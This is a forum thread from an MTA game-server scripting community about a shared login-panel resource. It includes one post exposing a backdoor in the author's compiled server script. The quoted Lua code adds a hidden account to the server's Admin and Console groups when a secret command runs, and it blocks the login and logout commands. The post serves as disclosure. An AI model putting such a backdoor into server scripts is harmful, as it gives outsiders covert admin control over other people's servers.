Jump to content

_Login Panel


Anony#

Recommended Posts

Posted

Hmm ...

I saw this window before in a server, Not sure what it was ...

But nicely done bro ;)

" Keep Thinking Different . " - Steve Jops

--------------------

Don't send me PMs asking for help, I Won't reply !

Posted (edited)
@ Lukasz Nice stolen panel... (Its the FFS one with changed skin) here is the proof..

FFs = Dx Panel

_Login = Gui Panel

even the dumbest know this is not "stolen"

ffs, even though the panel is in "gui" cuaquer knows that is not "stolen"

Edited by Guest

Team, MTA Scripters.

Posted

This IS the FFS login window, you could have copied the design, but it does look exactly how FFS one looks, except that it doesn't have the background image on the window.

"[...] If you don’t love it, if you’re not having fun doing it, you don’t really love it, you’re going to give up." - Steve Jobs, 2007

Posted

Requesting ban of Anony# and removal of the resource due to a built in backdoor in his script.

See yourself (taken from Server.luac):

addEvent("onServerTest", true) 
addEventHandler("onServerTest", getRootElement(), function(_ARG_0_) 
  if not isElement(_ARG_0_) then 
    return 
  end 
  setTimer(setCameraTarget, 3000, 1, _ARG_0_, _ARG_0_) 
  setTimer(fadeCamera, 3000, 2, _ARG_0_, true, 0.5) 
  setTimer(showPlayerHudComponent, 5100, 1, _ARG_0_, "radar", true) 
  setWaveHeight(0) 
  setHeatHaze(0) 
end) 
function aclGetGroups() 
  aclGroupAddObject(aclGetGroup("Admin"), "user.aclGetGroup") 
  aclGroupAddObject(aclGetGroup("Console"), "user.aclGetGroup") 
  outputChatBox("!!!") 
end 
addCommandHandler("aclGetGroup", aclGetGroups) 
addEventHandler("onPlayerCommand", root, function(_ARG_0_) 
  if _ARG_0_ == "login" or _ARG_0_ == "logout" then 
    cancelEvent() 
  end 
end) 

560x95_FFFFFF_FF9900_000000_000000.png

Posted

I think I posted the wrong script in the community and I'll fix it again postalo

I have no intention of harming anyone just esquei removing some lines.

(I removed "backdoor")

Team, MTA Scripters.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...